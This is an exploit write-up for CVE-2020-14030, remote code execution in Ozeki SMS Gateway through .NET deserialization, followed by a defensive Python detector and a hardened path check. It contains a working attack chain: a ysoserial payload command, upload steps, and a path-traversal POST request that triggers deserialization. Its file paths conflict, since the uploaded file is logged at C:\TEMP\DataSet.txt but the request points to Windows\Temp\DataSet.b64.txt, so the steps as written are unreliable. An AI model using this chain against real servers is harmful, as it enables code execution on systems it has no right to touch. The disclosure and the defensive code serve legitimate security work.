CVE-2020-14030: Ozeki SMS Gateway Remote Code Execution via .NET Deserialization

Ozeki SMS Gateway, versions 4.17.6 and below, stores SMS messages on the filesystem as .NET serialized (BinaryFormatter) objects.
An attacker who can write a crafted .NET serialized file to disk and trick Ozeki into deserializing it obtains arbitrary code execution on the server.

Requirements:

  • Access to the Ozeki web administration interface with "admin" credentials (both the upload and the "Move SMS Folder" steps below are performed through it)

Proof Of Concept:

Generate the malicious deserialization payload with the YSoSerial.NET tool, using the DataSet gadget and the BinaryFormatter output format (the format Ozeki reads SMS files with):

ysoserial.exe -f BinaryFormatter -c 'whoami > C:\Windows\Temp\Deserialization.txt' -g DataSet

Note: Quote the command for the shell you run ysoserial.exe from. PowerShell accepts the single quotes above; cmd.exe needs double quotes, otherwise it applies the > redirection to ysoserial itself instead of embedding it in the payload.
Note 2: Depending on the YSoSerial.NET build, the output is either the raw serialized stream or its base64 encoding (newer builds select this with -o raw or -o base64). The file uploaded in the next step must contain the raw bytes, so base64-decode the output first if necessary.
Note 3: When the payload is deserialized, the command that will be executed is: whoami > C:\Windows\Temp\Deserialization.txt

Upload the serialized payload file to the server, for example through the "Import Contacts" feature or as a Voice SMS attachment; any feature that writes the uploaded bytes to disk unmodified will do.

The event log confirms where the file was written, in this case "C:\TEMP\DataSet.txt". Keep that path, since the traversal in the next step has to point at it.

Looking directly at the filesystem, the uploaded file is there and contains the serialized payload unchanged.

Now use a path traversal in the "Move SMS Folder" functionality to trick Ozeki into deserializing the file.
This functionality does three things:

  • Takes the "messageid" of an SMS file without validating it, so a ".." path traversal can point it at a file outside the user's SMS boxes (inbox, outbox, sent, etc.)
  • Tries to move the file to the requested box, which fails because of the path traversal
  • Reads and deserializes the file in order to display it in the web interface

The last step is the one that matters: deserializing our file runs the payload's command.

Request:

POST /default HTTP/1.1
Host: <IP>:9501
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Cookie: usrckenc=b3c***TRUNCATED***04c

layout=MENUVIEW&MAIN=USERMAIN&MENU=USERMENU&user=admin&folder=outbox&movetofolder=sent&messageid_..\..\..\..\..\..\..\..\Windows\Temp\DataSet.b64.txt=on

If all the above steps were performed correctly, two things happen:

  • A "DataSet.txt.error" file appears, signifying that the path traversal was successful (the move step failed on the traversed path)
  • The command was executed and the file "Deserialization.txt" was created in C:\Windows\Temp
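The three-step behaviour above (unvalidated messageid, failed move, deserialize to display) is what a defender wants to spot in traffic and what the fix has to prevent. As an added example (not Ozeki's code and not part of the original write-up), the following Python pulls the ticked messageid values out of a "Move SMS Folder" form body, flags ids that carry ".." segments, path separators or a drive colon, and shows the canonicalise-then-check-prefix lookup that would have refused the traversal. The first sample body is the request shown above; the second is a constructed benign one. The SMS storage root and the layout root\user\folder\messageid, with a legitimate messageid being a bare file name, are this example's own assumptions.

```python
"""Detect the "Move SMS Folder" path traversal in request bodies and show the
server-side lookup that would have refused it.

Added example for this write-up, not Ozeki's code. The storage root below and the
layout root\\user\\folder\\messageid are assumptions made for the example.
"""
import ntpath
from urllib.parse import parse_qsl

MSGID_PREFIX = "messageid_"          # the form ticks each message as messageid_<id>=on
TRAVERSAL_MARKERS = ("..", "/", "\\", ":")

SMS_ROOT = r"C:\Ozeki\SMSData"       # assumed location of the per-user box folders

# The request body from the write-up, verbatim (eight ".." segments).
WRITEUP_BODY = (
    "layout=MENUVIEW&MAIN=USERMAIN&MENU=USERMENU&user=admin&folder=outbox&movetofolder=sent"
    "&messageid_..\\..\\..\\..\\..\\..\\..\\..\\Windows\\Temp\\DataSet.b64.txt=on"
)
# A constructed benign body: two ordinary messages moved from outbox to sent.
BENIGN_BODY = (
    "layout=MENUVIEW&MAIN=USERMAIN&MENU=USERMENU&user=admin&folder=outbox&movetofolder=sent"
    "&messageid_msg-0001.txt=on&messageid_msg-0002.txt=on"
)


def message_ids(body: str) -> list:
    """Ids of the messages ticked in a move-folder form body."""
    return [key[len(MSGID_PREFIX):]
            for key, value in parse_qsl(body, keep_blank_values=True)
            if key.startswith(MSGID_PREFIX) and value == "on"]


def is_suspicious_id(message_id: str) -> bool:
    """A bare file name never contains '..', a separator or a drive colon."""
    return any(marker in message_id for marker in TRAVERSAL_MARKERS)


def resolve_inside_box(root: str, user: str, folder: str, message_id: str):
    """Hardened lookup: join, canonicalise, then require the result to stay under the box.

    Returns the canonical path, or None when the id escapes root\\user\\folder
    (including an empty id, which would resolve to the box directory itself).
    Uses ntpath so the Windows semantics are reproduced on any host.
    """
    box = ntpath.normcase(ntpath.normpath(ntpath.join(root, user, folder)))
    target = ntpath.normcase(ntpath.normpath(ntpath.join(box, message_id)))
    if target == box or not target.startswith(box + "\\"):
        return None
    return target


def audit(body: str, root: str = SMS_ROOT):
    """Return (all ids, ids flagged as traversal, paths the hardened lookup would accept)."""
    params = dict(parse_qsl(body, keep_blank_values=True))
    ids = message_ids(body)
    flagged = [i for i in ids if is_suspicious_id(i)]
    accepted = [p for p in (resolve_inside_box(root, params.get("user", ""),
                                              params.get("folder", ""), i) for i in ids) if p]
    return ids, flagged, accepted


if __name__ == "__main__":
    for label, body in (("write-up request", WRITEUP_BODY), ("benign request", BENIGN_BODY)):
        ids, flagged, accepted = audit(body)
        print(f"{label}: ids={ids} flagged={flagged} accepted={accepted}")
```

The string check in is_suspicious_id is the cheap signal for a WAF rule or log search; the prefix check in resolve_inside_box is the server-side fix, and it also rejects absolute ids and sibling-box escapes that a blocklist of ".." alone would let through. Note that it only closes the traversal: the stored messages are still read with BinaryFormatter, so the deserialization sink itself is a separate problem.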

Additional Resources:

YSoSerial.NET: https://github.com/pwntester/ysoserial.net